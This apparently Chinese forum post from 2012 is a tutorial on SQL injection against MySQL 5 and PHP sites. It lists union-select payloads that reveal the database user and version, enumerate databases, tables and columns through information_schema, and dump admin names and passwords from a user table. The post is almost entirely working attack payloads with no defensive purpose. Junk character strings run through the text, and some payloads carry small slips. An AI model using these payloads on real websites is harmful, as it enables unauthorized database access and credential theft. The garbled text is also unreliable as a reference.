$ P5 v: |0 s `, p1 ~
教程内容:Mysql 5+php 注入
X7 @/ ~- C: W9 [" O7 i) O! W! N
% i* ^3 O# ~1 }$ p B5 Y: p" }+ R) o( q+ N7 n
5 `) U6 k* X1 y6 q3 b一.查看MYSQL基本信息(库名,版本,用户)
5 \& Q8 G/ `2 _) h/ R. g
1 O' c$ B2 s0 D/ zand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*& z- B) c* L; \ b
8 ~7 D% {9 l u+ x二.查数据库& F! l( n4 s2 {- Q
; G; g% \( s+ \& v5 ^/ U) Oand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*7 D8 Q; _8 P4 {# L' p6 c, Y" z& G4 y
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
: n, W! @- N. O2 r& f
/ b) L9 @# K5 g8 t$ G+ p: ~三.暴表
; K7 P/ S3 D9 Y) X3 x. c5 _; i, H: q1 d0 d% y* U5 P* T/ ~
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/* q- G* [/ ]9 J! a* k
' H% O m3 L' ^- `3 b9 T
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。3 P) q( b/ \# G9 |/ R4 X! W
$ w9 @# o( u* v# N v% o
四.暴字段# z, \+ M/ A3 p1 H+ t
6 z7 f2 M$ ]5 g: D* S# M" Land 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*; g5 @9 U9 ]3 k4 `# d, H5 s
" c: P7 D: |/ R _: V0 @4 ]limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。; m/ V" }& ?$ ?6 W9 W
% m" V( p# z' _/ Y
五.暴数据
9 M' _ m% f6 W) g' E+ Z6 a v* f4 w4 j
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
6 y3 {) y8 H/ D3 W1 B( M& V0 m& M# Z# V' b
: p9 ~4 ]9 L+ H# [9 r这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。7 C( o3 T4 g9 c' F2 q5 |' m
|
发表于 2012-9-13 16:27:53
收藏
支持
反对